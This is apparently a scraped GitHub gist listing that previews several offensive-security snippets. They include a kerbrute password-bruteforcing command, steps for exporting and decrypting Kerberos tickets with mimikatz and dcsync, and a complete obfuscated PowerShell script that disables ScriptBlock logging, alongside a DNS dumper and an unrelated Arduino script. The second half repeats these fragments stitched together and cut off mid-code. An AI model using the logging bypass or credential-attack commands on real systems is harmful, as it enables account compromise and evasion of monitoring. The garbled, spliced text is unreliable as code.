Adam M Toscher W00t3k

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              377 forks
            
          
              5 comments
            
          
              1098 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## decryptKerbTicket.py
#!/usr/bin/env python2
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
#   Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
#   Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
#   Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
#   Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
#   Run this script to decrypt:
#     ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./Administrator@TESTLAB.LOCAL_krbtgt~TESTLAB.LOCAL@TESTLAB.LOCAL.ccaches

## cbapi-ps-lsass-loop.py
# Carbon Black Evil PowerShell LSASS Query
#
# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe
#
# Author: Jason Lang (@curi0usJack)
#
# Prereqs (Windows 10)
#	Install bash on Win10
#	sudo apt-get install python-pip
#	sudo pip install --upgrade requests

## ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }

## Get-DNSARecords.ps1
function Get-DNSARecords {

    <#
    .SYNOPSIS
        Dumps A Records from a Microsoft Windows DNS server.
    .DESCRIPTION
        This script dumps the conent of MicrosoftDNS_AType to a CSV file.
    .PARAMETER Server
        The name of the Computer you want to run the command against.
    .PARAMETER CSVPath

## all.txt

.
..
........
@
*
*.*
*.*.*
ðŸŽ

## santa.js
var Cylon = require('cylon');
var EventEmitter = require('events').EventEmitter;
var Hapi = require('hapi');

var bot = new EventEmitter();
var on = false;

Cylon.robot({
    connections: {
        arduino: {
	#!/usr/bin/env python2
	# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
	# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
	#
	# Recommended Instructions:
	# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
	# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
	# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
	# Run this script to decrypt:
	# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./Administrator@TESTLAB.LOCAL_krbtgt~TESTLAB.LOCAL@TESTLAB.LOCAL.ccaches
	# Carbon Black Evil PowerShell LSASS Query
	#
	# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe
	#
	# Author: Jason Lang (@curi0usJack)
	#
	# Prereqs (Windows 10)
	# Install bash on Win10
	# sudo apt-get install python-pip
	# sudo pip install --upgrade requests
	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}
	function Get-DNSARecords {

	<#
	.SYNOPSIS
	Dumps A Records from a Microsoft Windows DNS server.
	.DESCRIPTION
	This script dumps the conent of MicrosoftDNS_AType to a CSV file.
	.PARAMETER Server
	The name of the Computer you want to run the command against.
	.PARAMETER CSVPath
	var Cylon = require('cylon');
	var EventEmitter = require('events').EventEmitter;
	var Hapi = require('hapi');

	var bot = new EventEmitter();
	var on = false;

	Cylon.robot({
	connections: {
	arduino: {